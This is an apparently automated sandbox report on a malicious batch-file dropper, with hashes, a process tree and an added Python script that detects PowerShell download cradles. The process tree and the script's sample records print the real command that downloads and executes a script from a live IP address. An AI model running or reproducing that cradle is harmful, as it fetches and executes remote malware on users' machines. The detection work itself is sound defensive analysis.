Analysis

max time kernel: 103s
max time network: 150s
platform: windows10_x64
resource: win10v200217
submitted: 21-02-2020 16:10

Static task: static1

Behavioral task: behavioral1
Sample: Qqgre83T.bat
Resource: win7v200217 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: Qqgre83T.bat
Resource: win10v200217 (windows10_x64)
0 signatures, 0 seconds
General

Target: Qqgre83T.bat
Size: 197B
MD5: 23fb28ede9070f21977214722b7b46fe
SHA1: f81fbe696a0abdcf0e314125ed1aaf8779feff0d
SHA256: 552e2dd699f7eb32c4ce0dc9dd35616b783cdf3fcb391b01b0422e2ad98a8a45
SHA512: dcd01869d9bd74264aba08b5c66f7a94b3c5513f0e713fdd3d596e1ed6cb43582c184d39ca9f78a6d23814a96535a5ef294f97c42594e10b7546d38e2f0cc4ac
Score: 10/10
Malware Config

Extracted
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/Qqgre83T
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3524  3224        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3524  WerFault.exe
  Token: SeBackupPrivilege   3524  WerFault.exe
  Token: SeDebugPrivilege    3524  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3524  WerFault.exe  (14 occurrences)

All three behavioral signatures are raised by WerFault.exe (PID 3524), the Windows Error Reporting process that handles the crash of powershell.exe (PID 3224); the privilege adjustments and process enumeration are part of crash-dump collection, not behavior of the downloaded payload. The 10/10 score rests on the extracted ps1.dropper configuration and the download-and-execute command line in the process tree below.
Processes

1. cmd.exe (PID 4048)
   Image: C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Qqgre83T.bat"

   2. powershell.exe (PID 3224), child of 4048
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Qqgre83T');Invoke-YKWELITCAXKXYN;Start-Sleep -s 10000"

      3. WerFault.exe (PID 3524), child of 3224
         Image: C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
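The process tree above is the detection-relevant part of this report: a .bat file run through cmd.exe spawns 32-bit PowerShell with an in-memory download cradle (IEX over WebClient.DownloadString), then calls a function that the fetched script presumably defines (Invoke-YKWELITCAXKXYN), and the PowerShell process later crashes, which is why WerFault.exe appears with -p 3224. The following is an added example, not code from the sandbox vendor or from this report: it runs over a few constructed process-creation records modelled on the command lines shown above (the record shape with pid/ppid/image/cmdline is an assumption, as is the parent PID 1234), flags PowerShell download cradles launched from a batch file, extracts the URL they fetch, and links any later WerFault.exe invocation back to the flagged process by its -p argument.

```python
"""Flag PowerShell download cradles launched from a batch file and link a
later WerFault.exe crash report back to the same process.

Added example for this report page, not sandbox-vendor code. The record
format (pid, ppid, image, cmdline) is an assumption; the sample records are
constructed from the command lines shown in the report's process tree.
"""
import re
from dataclasses import dataclass

# Constructed process-creation records modelled on the report's process tree.
# Parent PID 1234 for the top-level processes is an assumption.
SAMPLE_EVENTS = [
    {"pid": 4048, "ppid": 1234, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Qqgre83T.bat"'},
    {"pid": 3224, "ppid": 4048,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient)'
                 r".DownloadString('http://185.103.242.78/pastes/Qqgre83T');Invoke-YKWELITCAXKXYN;"
                 r'Start-Sleep -s 10000"')},
    {"pid": 3524, "ppid": 3224, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 704"},
    # A benign PowerShell launch (constructed) that must not be flagged.
    {"pid": 5000, "ppid": 1234,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Date"},
]

# IEX/Invoke-Expression combined with a WebClient download method is the
# classic in-memory cradle; both parts must be present to flag.
CRADLE_RE = re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b")
DOWNLOAD_RE = re.compile(r"(?i)\.(?:DownloadString|DownloadFile|DownloadData)\s*\(")
URL_RE = re.compile(r"(?i)https?://[^\s'\"()]+")
# WerFault.exe names the crashed process with -p <pid>.
WERFAULT_TARGET_RE = re.compile(r"(?i)werfault\.exe.*?-p\s+(\d+)")


@dataclass
class Finding:
    pid: int
    image: str
    urls: list        # URLs referenced on the command line
    chain: list       # ancestor-to-self image basenames, e.g. cmd.exe -> powershell.exe
    from_batch: bool  # parent is cmd.exe running a .bat/.cmd script


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _chain(by_pid, pid):
    """Walk ppid links upward as far as the records allow."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def find_cradles(events):
    """Return a Finding for every powershell.exe launch that is a download cradle."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if _basename(e["image"]) != "powershell.exe":
            continue
        cmd = e["cmdline"]
        if not (CRADLE_RE.search(cmd) and DOWNLOAD_RE.search(cmd)):
            continue
        parent = by_pid.get(e["ppid"])
        from_batch = bool(parent and _basename(parent["image"]) == "cmd.exe"
                          and re.search(r"(?i)\.(?:bat|cmd)\b", parent["cmdline"]))
        findings.append(Finding(e["pid"], e["image"], URL_RE.findall(cmd),
                                _chain(by_pid, e["pid"]), from_batch))
    return findings


def link_crashes(events, flagged_pids):
    """Map each flagged pid to the WerFault.exe pid that reported its crash."""
    links = {}
    for e in events:
        m = WERFAULT_TARGET_RE.search(e["cmdline"])
        if m and int(m.group(1)) in flagged_pids:
            links[int(m.group(1))] = e["pid"]
    return links


def analyze(events):
    findings = find_cradles(events)
    crashes = link_crashes(events, {f.pid for f in findings})
    return {"cradles": findings, "crashes": crashes}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for f in result["cradles"]:
        print(f"pid {f.pid}: {' -> '.join(f.chain)} fetches {f.urls} (from batch: {f.from_batch})")
    for target, werfault_pid in result["crashes"].items():
        print(f"WerFault pid {werfault_pid} reported a crash of flagged pid {target}")
```

On the constructed records this flags only PID 3224 (the benign Get-Date launch is ignored because it has neither IEX nor a download call), recovers the same URL the report lists under ps1.dropper, and ties WerFault PID 3524 to it through -p 3224. In production the same logic would be applied to Sysmon Event ID 1 or Windows Security 4688 records; the crash link is worth keeping because a cradle that crashes still confirms the download was attempted and leaves the URL on disk in the process-creation log.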